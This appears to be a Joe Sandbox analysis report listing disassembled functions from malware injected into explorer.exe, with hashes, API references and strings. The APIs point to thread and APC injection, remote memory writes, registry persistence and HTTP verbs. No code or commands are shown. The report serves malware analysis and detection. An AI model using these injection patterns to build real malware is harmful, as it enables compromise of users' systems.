Opcode ID: 6fc20d21720ccc80084a6e2228c9b2dc364fcc3dc8626018cb98fa32108dfc51
Instruction ID: 01e4248b1e2c6b808ad71c9bb767054d1abe90b17be749f290ee6d28da9b3fee
Opcode Fuzzy Hash: 6fc20d21720ccc80084a6e2228c9b2dc364fcc3dc8626018cb98fa32108dfc51
Instruction Fuzzy Hash: C231CC30318B098FE754EF69989D7A976E1F798351F20812AD85BC3260DF34D4468792

Uniqueness

Uniqueness Score: -1.00%

Function 04DB076C, Relevance: 3.1, APIs: 2, Instructions: 97registryCOMMON

Download Yara Rule

APIs

Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887

RegQueryValueExA.KERNEL32 ref: 04DB07C3
RegCloseKey.KERNEL32 ref: 04DB0833

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID:
API String ID: 4083198587-0
Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
Instruction ID: 3f5244d7c4b83050dcf32d7fa4d1f3f1c80533df42f815bf7a2f3534fa8df739
Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
Instruction Fuzzy Hash: 35211074718B088FE754EF69E88966677E1FB9C351F10452AE48AC3261EB34D941CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 04DC1E58, Relevance: 3.1, APIs: 2, Instructions: 67registryCOMMON

Download Yara Rule

APIs

Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887

RegSetValueExA.KERNEL32 ref: 04DC1EB5
RegCloseKey.KERNEL32 ref: 04DC1ECA

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 010525a06cc86e1282a1dcc70fc59988e251bf6a3581915b7ed371b63630e897
Instruction ID: 3e938d95edd7347091b8cfbfa4e440cd5b8b1ba8336569b48c7f90360cc52b71
Opcode Fuzzy Hash: 010525a06cc86e1282a1dcc70fc59988e251bf6a3581915b7ed371b63630e897
Instruction Fuzzy Hash: 3B113C70608B088F9784EF589499A29B7E1FB9C310F11455EE89EC3321DB74EC428B83

Uniqueness

Uniqueness Score: -1.00%

Function 04DCA864, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 04DCA887
RegOpenKeyA.ADVAPI32 ref: 04DCA894

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
Instruction ID: c472ad881caa68e253c81c202850fbb6570d37d2494a2e13b003ebab4d42b7a4
Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
Instruction Fuzzy Hash: AC018434618A498FDB58EF5C9488769BBE1FBD8341F10442EE88DC3365DAB5D9418782

Uniqueness

Uniqueness Score: -1.00%

Function 04DC10CC, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 04DC10FC
QueueUserAPC.KERNEL32 ref: 04DC1113

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
Instruction ID: c0fcec509099c419394e0e91c06255d68d672a65a142fcbd82188a980e16752e
Opcode Fuzzy Hash: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
Instruction Fuzzy Hash: 2E017531714A194FAB44EF2CA84D77977E2FBAC711704856EE509C3275DB38DC428B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DBD0F0, Relevance: 1.7, APIs: 1, Instructions: 224fileCOMMON

Download Yara Rule

APIs

Part of subcall function 04DBAF6C: GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,04DA1992), ref: 04DBAFE3

DeleteFileA.KERNEL32 ref: 04DBD215

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: File$DeleteNameTemp
String ID:
API String ID: 1648863064-0
Opcode ID: 03c2a81f9a1c11a55abee96452262d0c0f893495191509de088cf81c326b8804
Instruction ID: 727e23e74fa5aec55d45e0f276ef18ce3fd3164ffe62b918625cd8d2b397312d
Opcode Fuzzy Hash: 03c2a81f9a1c11a55abee96452262d0c0f893495191509de088cf81c326b8804
Instruction Fuzzy Hash: 9B619030714A86CBEB39EB69DC987FA73D2FB94305F5489399887C7251DE38E4058781

Uniqueness

Uniqueness Score: -1.00%

Function 04DB7DD8, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 04DB7F24

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
Instruction ID: dcdc01d907bd50d34fe649b6b9a9c0f871be1d10c735b8a0c8f4e14dfca2cc5a
Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
Instruction Fuzzy Hash: 09613170618E05DFD754EF18D885A66B7E1FBAC301B50451EE88BC3661EB34F8418BD6

Uniqueness

Uniqueness Score: -1.00%

Function 04DA4FD4, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe02ce455d67f09005d2a37bd3cb44e7baf2b907739215d65d192ed9e4198867
Instruction ID: af115c9af3b16d4f49eadae2f2942f5f294ed31c31017c6797a2a7b35c07d1f1
Opcode Fuzzy Hash: fe02ce455d67f09005d2a37bd3cb44e7baf2b907739215d65d192ed9e4198867
Instruction Fuzzy Hash: 8351E870708B098FDB55DF2CE89966577E1FB98314F40462EE49AC3260EF34E856CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04DA5020, Relevance: 1.7, APIs: 1, Instructions: 166registryCOMMON

Download Yara Rule

APIs

RegGetValueW.KERNEL32 ref: 04DA51AE

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 216024542556dd411309f50c38fb88be061509f9e4b6fc9683d9ccb6d9a37dc5
Instruction ID: 6a5be8e1410c20c4145a59da6c28e246b0648c296a8593ba4b5dc84a6e5935eb
Opcode Fuzzy Hash: 216024542556dd411309f50c38fb88be061509f9e4b6fc9683d9ccb6d9a37dc5
Instruction Fuzzy Hash: 53519230208B098FE754DF2CE89962677E1FB98305F00462EA44AC3360EF34E941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DA68E0, Relevance: 1.7, APIs: 1, Instructions: 154fileCOMMON

Download Yara Rule

APIs

Part of subcall function 04DBAF6C: GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,04DA1992), ref: 04DBAFE3

DeleteFileA.KERNEL32 ref: 04DA6A0A

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: File$DeleteNameTemp
String ID:
API String ID: 1648863064-0
Opcode ID: 97c45c61a68756274780ff7a1a17f6003908ad3c066fe8c6cc2df5c60146dca1
Instruction ID: 3a3e56b4300fd71e245e057351ca2c08aa878d35e5c4d9263f76e55c965f7c85
Opcode Fuzzy Hash: 97c45c61a68756274780ff7a1a17f6003908ad3c066fe8c6cc2df5c60146dca1
Instruction Fuzzy Hash: 1441C63031CA188FEB69EF69D889A7D33D1F799710B14442DD48BC32A6ED68EC5287D1

Uniqueness

Uniqueness Score: -1.00%

Function 04DA7944, Relevance: 1.6, APIs: 1, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 04DA799D

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e3e6a161d5b02e9d01103ed044012703cd526c8f6528559d8211e7e6a4259e8
Instruction ID: ec6d8cb4612614083c2bdb37315608ac72cb229abf6d95e598c7abb7589856c3
Opcode Fuzzy Hash: 4e3e6a161d5b02e9d01103ed044012703cd526c8f6528559d8211e7e6a4259e8
Instruction Fuzzy Hash: 73419C343086458FE758DF68C8D8A7A73F6FB89306F00442DE58AC7251EB79E951CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04DCF04C, Relevance: 1.6, APIs: 1, Instructions: 136pipeCOMMON

Download Yara Rule

APIs

CallNamedPipeA.KERNEL32 ref: 04DCF141

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CallNamedPipe
String ID:
API String ID: 1741058652-0
Opcode ID: 3a8f9de0c657a49d155db600dd5a5f386ffbca9f062bf4a1c4fbe15f73d8f60f
Instruction ID: 252ad514d0c634a22142623d16340dae5fd527b9ddf367275565e5a16b334b78
Opcode Fuzzy Hash: 3a8f9de0c657a49d155db600dd5a5f386ffbca9f062bf4a1c4fbe15f73d8f60f
Instruction Fuzzy Hash: 8941B37161CB098FE758DF58E8899B677E5FB98700F00456EE94AC3261EE74F801CB85

Uniqueness

Uniqueness Score: -1.00%

Function 04DB217C, Relevance: 1.6, APIs: 1, Instructions: 119networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 04DB2231

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: gethostbyname
String ID:
API String ID: 930432418-0
Opcode ID: 5f05322b8684c5dce78c252173af7e4799d163bf0f3aee7cf75f238d3e8e6222
Instruction ID: 9a0be33a1696211d2706063a5c12bbf9bcf2e7c77df2ee55ea9bdc2f13c9b44f
Opcode Fuzzy Hash: 5f05322b8684c5dce78c252173af7e4799d163bf0f3aee7cf75f238d3e8e6222
Instruction Fuzzy Hash: 1E316131708A1CCF9B58EF69E88956977E1FB9C301B54886DE84BC3221EA74D946C781

Uniqueness

Uniqueness Score: -1.00%

Function 04DB7A04, Relevance: 1.6, APIs: 1, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 04DB7A32

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ff708e24ccf0847f36c1806cad05615ff8cebb489172a381ea6a649745fbfcf6
Instruction ID: 6c1c5dd57a81e8cce6ab359a97bb4d30785bb3d3131f881a530cabbb8b0647fa
Opcode Fuzzy Hash: ff708e24ccf0847f36c1806cad05615ff8cebb489172a381ea6a649745fbfcf6
Instruction Fuzzy Hash: 72311074718B088FDB94EF28D858B6AB7E1FB98341F50456DE48EC3264DB78D941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DBBCC8, Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 04DBBD02

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 00c99e4237884e64ecf479b4bce83207a97088a339d818223d5ae1b9bbcb711a
Instruction ID: dd7a1738d6baef904e30acb8802d21899807c4c918410f4ac219a5079ee71166
Opcode Fuzzy Hash: 00c99e4237884e64ecf479b4bce83207a97088a339d818223d5ae1b9bbcb711a
Instruction Fuzzy Hash: 2C21623160CB098FA714EB5DDC996A577D1F798351F04843AE88AC3261EA74E84187C1

Uniqueness

Uniqueness Score: -1.00%

Function 04DCA8F8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 04DCA9C8

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 14b02dd6c9e907ec2f2737c0b09998d7d0f9f84179de5284574e2a4d11ca5392
Instruction ID: ba605482173931065beefe3d314f413df4b39eeff91cfce37b08fafd878a3dfb
Opcode Fuzzy Hash: 14b02dd6c9e907ec2f2737c0b09998d7d0f9f84179de5284574e2a4d11ca5392
Instruction Fuzzy Hash: 4321D830718A098FDB08EF78D8992AA77D5FB99305F41842DE88BC3355EE34E8058791

Uniqueness

Uniqueness Score: -1.00%

Function 04DBAF6C, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,04DA1992), ref: 04DBAFE3

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: f2832eb2cade261e6e517229f0148254a84f956b48d9d74b9b7ce22701d13fdb
Instruction ID: b87b1402c2f0ff5a30effc498f820b1d8b1a7be77290c7074aed28f8af443bf4
Opcode Fuzzy Hash: f2832eb2cade261e6e517229f0148254a84f956b48d9d74b9b7ce22701d13fdb
Instruction Fuzzy Hash: A8216531308A058FAB59DF69AC9867A37D2FBD83017148129E447C3154DE38E9468781

Uniqueness

Uniqueness Score: -1.00%

Function 04DC1458, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 04DC148B

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
Instruction ID: 28e1e3a6052403b955c062fadafa34a1e98db3346a4281a5354f56272f69bf85
Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
Instruction Fuzzy Hash: 2611813120CB088F9B18EF59E8850A9B3E5FB9C316700452DE94EC3256EA30E905CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 04DB638C, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887

RegQueryValueExA.KERNEL32 ref: 04DB63E2

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
Instruction ID: 0cd54d59f9ed40d77812a5bc1b5e80d1d311e1e7252f954ebed774b4263904d2
Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
Instruction Fuzzy Hash: 8521213061CB488FE755EF64D888AAAB7E1FB98309F50096EE48BC3250EB74D545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DA85E8, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 04DA8628

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32ea44639e2575752aae5852ebfdb13d51a2d7fe9b7ca05d47b439ede88620c7
Instruction ID: 67acc63dbfc2287b66e6e92f3d6a57e30468b2bcb39cd8db35926f45aa0d0825
Opcode Fuzzy Hash: 32ea44639e2575752aae5852ebfdb13d51a2d7fe9b7ca05d47b439ede88620c7
Instruction Fuzzy Hash: 9D1188707046044FE754DF68D49832A76D1FB8C325F298A2DF85AC37D0DB789941C742

Uniqueness

Uniqueness Score: -1.00%

Function 04DA94F0, Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 04DA9559

Part of subcall function 04DC1E58: RegSetValueExA.KERNEL32 ref: 04DC1EB5
Part of subcall function 04DC1E58: RegCloseKey.KERNEL32 ref: 04DC1ECA

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CloseTimerValueWaitable
String ID:
API String ID: 1352355977-0
Opcode ID: e3aa066d265a63dea7bf9722da53871929a24fc67bcf5ed35ac10724dab03a71
Instruction ID: a05684025133ad83f523bf1ce33026ffa7249a7f1806a7ae58e270bfdcb17b4e
Opcode Fuzzy Hash: e3aa066d265a63dea7bf9722da53871929a24fc67bcf5ed35ac10724dab03a71
Instruction Fuzzy Hash: C201B131218B088FDB45EB28D48876EBBE0FBD9311F100A5EE58AC3160DF75D4418B82

Uniqueness

Uniqueness Score: -1.00%

Function 04DAFB90, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 04DB3830: NtWriteVirtualMemory.NTDLL ref: 04DB384F

VirtualProtectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DAFBE4

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
Instruction ID: 4b3cdc6c951fddbb9eb487e2302702023610dc38c044822d63d756e879b43cb1
Opcode Fuzzy Hash: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
Instruction Fuzzy Hash: FD017C70618B088FCB48EF58A0C452AB7E0FB9C310B4005AEE84EC7356CB70DD45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04DB64F8, Relevance: 1.5, APIs: 1, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 04DB6536

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 12b9b79c15c5aab77b152edb17cccdcc073a16d7b29624bf842b1d686773addd
Instruction ID: 381709761c738c7f3a3e69d4123f92a57599ca70d35db1c3fb2f1abd3aa3fa9a
Opcode Fuzzy Hash: 12b9b79c15c5aab77b152edb17cccdcc073a16d7b29624bf842b1d686773addd
Instruction Fuzzy Hash: 66F03030358E098FB788EB6DAC9C66536D2E7AC601B048039B44AC3264EE64D8418782

Uniqueness

Uniqueness Score: -1.00%

Function 04DB694C, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL ref: 04DB6995

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 69fdc09703159843f7cd7d2f30b1b3dcc8a53e7e4aad6a8f0448b74fd27edef4
Instruction ID: 1ab67154cb61a45052a533997bb72bec4011411fcac7495472a867ed738cf941
Opcode Fuzzy Hash: 69fdc09703159843f7cd7d2f30b1b3dcc8a53e7e4aad6a8f0448b74fd27edef4
Instruction Fuzzy Hash: 2BF01230254A058BEB59DF38DCD466677A2EB85311B14865CE416C61D4DF74D842CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04DC2D84, Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL ref: 04DC2D97

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 8f30c42a237391e3bd4efc725238890a726ebde1fc6d63616ab5e1f0a126eae9
Instruction ID: b80ab827e8f35d98c8e3e8bd376f4b88e185f056204786a6a395f60c02eec2c4
Opcode Fuzzy Hash: 8f30c42a237391e3bd4efc725238890a726ebde1fc6d63616ab5e1f0a126eae9
Instruction Fuzzy Hash: 1BB09B3450170C97D53C77F85C5D1453755E784135B00CF545171468D0DE7D56514757

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04DBB520, Relevance: 8.2, Strings: 6, Instructions: 654COMMON

Download Yara Rule

Strings

GET , xrefs: 04DBB55C
GET , xrefs: 04DBB877
POST, xrefs: 04DBB56C
OPTI, xrefs: 04DBB87F
OPTI, xrefs: 04DBB574
PUT , xrefs: 04DBB564

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 0-647159250
Opcode ID: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
Instruction ID: 26869e95ad27890fab56a6e2c8c99596a4b98f1206c17ce96370d1e2aababcc2
Opcode Fuzzy Hash: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
Instruction Fuzzy Hash: 21129430618B098FDB69EF28D8996E673E1FB95301F54452AD8CBC3655DF34F8428B82

Uniqueness

Uniqueness Score: -1.00%

Function 04DA5474, Relevance: 3.2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

Strings

}UKt, xrefs: 04DA580A
:9s, xrefs: 04DA5802

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: :9s$}UKt
API String ID: 0-2423254669
Opcode ID: 9dfd0a7150b396390c702348001b287cdc48f5c70b2da00c9676731c0eb395bc
Instruction ID: 526a8051ca03ba64aeb698c8c34ef3156587070bc6b429f62595d3a711ad81c2
Opcode Fuzzy Hash: 9dfd0a7150b396390c702348001b287cdc48f5c70b2da00c9676731c0eb395bc
Instruction Fuzzy Hash: 5422F8317287459BDB2C9F28A8F927972D2FB94304F18453ED48BC7690EE38F4658742

Uniqueness

Uniqueness Score: -1.00%

Function 04DB0CC0, Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

K, xrefs: 04DB0DAC
P, xrefs: 04DB0DA4

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: K$P
API String ID: 0-420285281
Opcode ID: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
Instruction ID: af9de5cc0f28235781e1382dac559897eedfd338271a1f2114fe874f494a3a14
Opcode Fuzzy Hash: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
Instruction Fuzzy Hash: 8341703010CB88CFCB5ADE5C888465BBBE0FBA9304F540A9DE4CAC7242D774DA55C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 04DB9380, Relevance: 2.2, Strings: 1, Instructions: 932COMMON

Download Yara Rule

Strings

W, xrefs: 04DB93E2

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
Instruction ID: a1b8b50753c18cb73698d1e9a320c93a858b72e4d14d3bae0bc5a82148afc844
Opcode Fuzzy Hash: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
Instruction Fuzzy Hash: 0E42D171318A488FDB68EF68DCD95A973E2F799300F14456ED98BC3250EE34E90687C2

Uniqueness

Uniqueness Score: -1.00%

Function 04DA6D08, Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

vids, xrefs: 04DA6E0E

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: vids
API String ID: 0-3767230166
Opcode ID: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
Instruction ID: c6b7fea857fe983b04ea4ca9a2709b38dc52dbc7ad7294cf011a948677f9308b
Opcode Fuzzy Hash: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
Instruction Fuzzy Hash: 89C149716187448FE728EF68C455BAAB7E1FBD5315F14492EE4CAC3250EB34E816CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DA8B5C, Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

P, xrefs: 04DA8BFB

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
Instruction ID: 0925a0dcdb7ed8f23175dcbd60e7159d03148abc9b5d73847ede4960db8eef75
Opcode Fuzzy Hash: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
Instruction Fuzzy Hash: B8A1E530308A098FEB64FF28D88976973E5FB98301F14452DE88AC3250DF38E946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DB3CE0, Relevance: 1.0, Instructions: 982COMMON

Download Yara Rule

Memory Dump Source

